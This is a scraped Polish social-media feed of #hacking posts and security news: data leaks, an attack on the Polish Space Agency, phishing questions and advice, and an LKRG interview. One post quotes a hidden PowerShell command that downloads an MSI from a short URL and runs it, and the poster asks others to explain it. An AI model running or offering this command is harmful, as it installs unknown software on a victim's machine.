Wszystko
Najnowsze
Archiwum
- 0
Mogłeś np. zrobić, aby szukało Tobie Mariusza ze szczecina w wieku 35 lat. I wyskakiwały profile, które spełniały te wymagania.
Potem niestety zostało to powycinanie i nigdy nie widziałem ani nie słyszałem o opcjach, aby móc to robić.

źródło: temp_file7574573761131592844
PobierzMacie pomysl jak to zrobili że phishuja dane prosto z apki msnger? Wylogowało mnie i prosiło o podanie hasła, z rozpędu wpisałem i konto przejęte.
Phishing w kliencie usługi? Nowe.
@AnimateHi: raczej jest jakiś hack na przejęcie sesji, ale musi być nowa lub jakiś "uścisk" jest możliwy do przejęcia w momencie logowania.
Ostatnio dostałem powiadomienie z jednej grupy, że FB wymoderował jakiś post... i ani to mój post był, ani
31
Wyciek danych osobowych członków partii Nowa Nadzieja

W jednym z serwisów internetowych dla cyberprzestępców opublikowano plik zawierający dane członków partii Nowa Nadzieja. Dane ujawnione przez przestępców wskazują na to, ze miejscem wycieku był element systemu służący do opłacania składek członkowskich.
z- 12
- #
- #
- #
- #
- #
- #
- 0
W dobie cyfrowej transformacji firmy stoją przed wyzwaniami związanymi z zarządzaniem ogromną liczbą urządzeń końcowych (endpointów) – komputerów, laptopów, serwerów i urządzeń mobilnych. HCL BigFix to kompleksowe narzędzie, które automatyzuje, zabezpiecza i optymalizuje zarządzanie IT w organizacjach, niezależnie od ich wielkości i struktury.
🔥 Czym jest HCL BigFix?
HCL BigFix to zintegrowana platforma do zarządzania infrastrukturą IT, która umożliwia zarządzanie wszystkimi urządzeniami końcowymi z
#hacking #hakerzy #hakerstwo #cracking #konsole
W jaki sposób działają osoby parające się crackingiem konsol? Z jakiego oprogramowania korzystają do wyszukiwania luk w konsoli? Dlaczego to robią?
〰〰〰〰〰〰〰〰〰〰〰〰〰〰〰
· Akcje: Odpowiedz anonimowo · Więcej szczegółów
- 0
7
Atak hakerski na Polską Agencję Kosmiczną. Zabezpieczyliśmy systemy

Polska Agencja Kosmiczna padła ofiarą ataku hakerskiego. W związku z incydentem zabezpieczone zostały systemy objęte atakiem poinformował Krzysztof Gawkowski, minister cyfryzacji. Służby ustalają sprawcę ataku
z- 2
- #
- #
- #
- #
- #
- 0
Z ciekawosci sobie w authenticatorze sprawdziłem atywność na koncie Microsoft i zauważyłem, że od kilku miesięcy kilka razy dziennie mam podejrzaną aktywność. Próby logowań z różnych miejsc - błędne hasło. Konto zabezpieczone aplikacją + mocne hasło. O co chodzi?
#microsoft #informatyka #hacking #komputery
Mnie dawniej niepokoiły potwierdzenia logowań z jakiś dziwnych geolokalizacji no ale tak to klasyfikuje widocznie logowanie do różnych serwisów powiązanych
- 0
czy po wszyskich ostatnich nowelizacjach reformach,IKP* itd hwdp.
istnieje w naszym systemie lekow recept itd jakis sposob flagowania ludzi?
mam na mysli konkretny mechanizm - tylko lekarz rodzinny widzi IKP*
czyli np wystawione juz na pesel reecepty, inni lekarze nie widza tego o ile nie zapytaja o
https://bitcoinpl.org/bybit-zhakowane-przez-polnocnokoreanska-grupe-lazarus-najwiekszy-atak-hakerski-w-historii-kryptowalut/
#kryptowaluty #bitcoin #hackingnews #hacking #hakerzy

źródło: image
Pobierz- 0
5
Jak rozpoznać phishing? Praktyczne porady cyberbezpieczeństwa

Jak sprawdzić, czy podejrzany link lub załącznik w wiadomości są złośliwe? Można to zrobić w kilku prostych krokach, za darmo. Zapraszamy do artykułu otwierającego nasz cykl praktycznych porad cyberbezpieczeństwa dla każdego
z- 2
- #
- #
- #
- #
- #
- #
- 0
#hacking #informatyka #programowanie
- 0
cmd /c start /min powershell -NoProfile -WindowStyle Hidden -Command $path='c:\users\public\3aw.msi'; Invoke-RestMethod -Uri 'https://cośtam.short.gy/1' -OutFile $path; Start-Process $path;
Adres w kodzie powyżej zmieniłem, żeby nikt się nie naciął. Oczywiście nic nie wklejam, ale jestem ciekaw co to polecenie zrobi.
Pomożecie rozszyfrować?
#hacking #wirus

źródło: Zrzut ekranu 2025-02-10 210023
Pobierz12
Wyciek danych ze strony z przepisami. Na celowniku użytkownicy Thermomiksa

Fakt, że wypłynąć może informacja o dodawaniu pizzy do ananasa, jest najmniejszym problemem w tym przypadku. Wprawdzie Vorwerk zapewnia, że najważniejsza informacja nie wpadła w ręce cyberprzestępców, ale i tak pozyskali cenne dane.
z- 23
- #
- #
- #
- #
- #
15
Polskie projekty IT Security co słychać w LKRG (Linux Runtime Kernel Guard)
Rozmawiamy z Adamem "pi3" Zabrockim oraz Solar Designerem o LKRG (Linux Runtime Kernel Guard), które może znacznie utrudnić zhackowanie Linuxa. Co słychać i jak przebiega rozwój projektu, czy ktoś próbował skutecznie obejść LKRG? Zapraszamy do lektury! :)
z- 4
- #
- #
- #
- #
- #
- #
#hacking #komputery